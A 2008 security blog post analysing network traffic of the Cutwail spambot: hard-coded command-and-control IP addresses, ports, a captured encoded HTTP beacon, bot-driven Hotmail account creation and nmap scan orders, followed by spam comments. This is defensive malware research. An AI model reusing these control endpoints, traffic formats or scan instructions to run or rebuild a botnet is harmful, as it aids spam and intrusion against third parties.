A little Cutwail spambot analysis on network traffic
September 24th, 2008 — bjouRecently, while analyzing network traffic of a Cutwail binary (a spambot commonly installed by a trojan of the Pushdo family), I found some interesting behavior in its command-and-control communication. Although I expected some encrypted HTTP communication on port 4080 as stated in the recent research about the TOP Spam Botnets from April 2008, I found a completely different setup. First, there have been over a dozen backend nodes (motherships) all in the 216.195.[52-63] range. Analyzing the binary revealed more hard-coded IP addresses in Russia and the US:
78.109.30.80
78.109.30.64
78.109.30.56
78.109.30.48
78.109.30.24
78.109.30.32
78.109.30.16
78.109.29.240
78.109.29.232
78.109.30.8
216.195.63.18
216.195.57.116
208.71.130.48
208.71.130.144
216.195.63.19
216.195.63.20
216.195.63.25
216.195.63.36
216.195.56.250
216.195.56.251
216.195.57.125
216.195.63.21
216.195.63.22
216.195.63.23
216.195.63.24
216.195.52.17
216.195.52.18
216.195.52.157
Moreover, traffic was not completely encrypted and not at all on port 4080/tcp. Ports in use have been 7230/tcp (encrypted), 8195/tcp (encrypted), 8001/tcp (plain), 3078 (plain) and 3128 (plain with base64-encoded HTTP payload representing IP addresses (in decimal) for whatever reason, see below). Again, data shown is not sanitized or censored in any way.
POST / HTTP/1.1
Accept: */*
Accept-Language: en
Cache-Control: no-cache
Pragma: no-cache
Accept-Charset: iso-8859-1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 216.195.55.10:3128
Content-Length: 85
Connection: Keep-Alive
data=5NIkrmdE9mkmNhBBD+yxLNZAUjtwQNC0uO4Gxf17PH6RUuBFmKfWGzYC6IecvQ3INDLDOEaJlyr37hwE
HTTP/1.1 200 OK
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Cache-Control: no-cache
Date: Fri, 29 Aug 2008 19:23:32 GMT
Last-Modified: Fri, 29 Aug 2008 19:23:32 GMT
Server: Apache/1.3.35 (Unix) PHP/4.4.2
Content-Length: 110
{NTQx9k+dqZV6afQgf2ABxEjDK5OPtU2/XPa8nj4GndeDqESDAmD0XeGBu1SS7ux0pL9vTIIFzqeYtyMXbJQMOZxHIz2ZaBBWFnttDXrlUcp=}.
Moreover, I found that the bots tried to automatically create Hotmail accounts using an XML template that has been provided by a mothership before. I uploaded the template for the interested reader. This template is a guide through the Hotmail signup form, apparently also able to break CAPTCHAs. Furthermore, one bot additionally downloaded nmap and received instructions from a mothership containing nmap options and IP addresses.
.{....+\....-T5 -sV.128.194.136.173.53,80...+\....-T5 -sV.128.194.136.147.53,80...+\....-T5 -sV.128.194.137.81.53,80...+\....-T5 -sV.128.194.137.101.53,80...+\....-T5 -sV.128.194.136.240.53,80...+\....-T5 -sV.128.194.137.16.53,80...+\....-T5 -sV.128.194.137.136.53,80...+\....-T5 -sV.128.194.137.95.53,80...+\....-T5 -sV.128.194.137.35.53,80...+\....-T5 -sV.128.194.137.42.53,80.
Option -sV: Probe open ports to determine service/version info
Option -T5: Set timing template (higher is faster) <– 5 is the highest
As can be seen, the control in the botnet’s background is done via pretty diverse channels. Of course, one major task of the bot is still spamming, this short analysis concentrated on its C&C, however, using binaries from July/August 2008. Note, that this study might not be up to date any more by now…
September 24th, 2008 at 1:28 pm
[...] I posted an analysis of Cutwail, today, while analyzing a Rustock/Costrat binary, I found something [...]
January 15th, 2010 at 10:27 pm
[...] social network creation / spamming, even domain registration. There was an old web engine (Imrabot) used by Pushdo back in 2008 – but it is not as capable as Webwail, and seems to have been a predecessor that was not [...]
May 5th, 2011 at 5:15 pm
Good stuff! I’m satisfied to see the new structure on your weblog urls.
June 7th, 2011 at 5:24 am
I don’t usually reply to posts but I’ll in this situation.
my God, i believed you were going to chip in with some decisive insght on the finish there, not depart it
with ‘we depart it to you to decide’.
June 13th, 2011 at 3:37 pm
I dont totally determine your view, but I get the point.
August 25th, 2011 at 6:58 am
I absolutely love your blog and find many of your post’s to be what precisely I’m looking for. can you offer guest writers to write content available for you? I wouldn’t mind producing a post or elaborating on a number of the subjects you write in relation to here. Again, awesome blog!
November 1st, 2011 at 2:57 am
dont ask dont tell…
[...]listed here are a couple of hyper-links to internet pages which I connect to as we think they will be truly worth checking out[...]…
November 1st, 2011 at 3:16 am
This wasnt quite clean.
November 1st, 2011 at 3:17 am
I?ll immediately take hold of your rss feed as I can not find your e-mail subscription link or newsletter service. Do you’ve any? Kindly let me understand in order that I may subscribe. Thanks.
November 2nd, 2011 at 1:49 am
I keep listening to the news broadcast speak about getting boundless online grant applications so I have been looking around for the finest site to get one. Could you tell me please, where could i get some?
November 5th, 2011 at 1:51 am
This article is an example of writing by someone who really cares about their content. I wish I could find more good reading like this online, but not all writers care as much as you.
December 2nd, 2011 at 2:15 pm
Howdy, ich bin mal so frech und poste mal was auf deinem Blog.Sieht ja eigentlich alles ganz vernünftig aus!Momentan beschäftige ich mich auch mit dem Thema eigener Wordpress Blog , allerdings suche ich noch ein passendes Design und suche ein paar Wordpress Blogs durch,wo ich vielleicht etwas passendes finde als Anregung! MfG
December 19th, 2011 at 2:19 am
you are really a good webmaster. The website loading speed is amazing. It seems that you’re doing any unique trick. Furthermore, The contents are masterpiece. you have done a excellent job on this topic!
December 26th, 2011 at 5:10 pm
Youre so cool! I dont suppose Ive read something like this before. So good to search out anyone with some authentic ideas on this subject. realy thank you for beginning this up. this website is one thing that is wanted on the web, someone with a bit of originality. useful job for bringing one thing new to the web!
January 4th, 2012 at 6:52 am
Hi there, simply changed into alert to your weblog through Google, and found that it’s truly informative. I am gonna watch out for brussels. I’ll be grateful in case you proceed this in future. Numerous people will probably be benefited out of your writing. Cheers!
January 4th, 2012 at 8:55 pm
Appreciating the time and energy you put into your blog and in depth information you provide. It’s nice to come across a blog every once in a while that isn’t the same old rehashed information. Great read! I’ve saved your site and I’m adding your RSS feeds to my Google account.
January 5th, 2012 at 8:16 am
I believe this is one of the most significant information for me. And i’m glad reading your article. However wanna commentary on some basic issues, The website style is great, the articles is actually excellent : D. Good process, cheers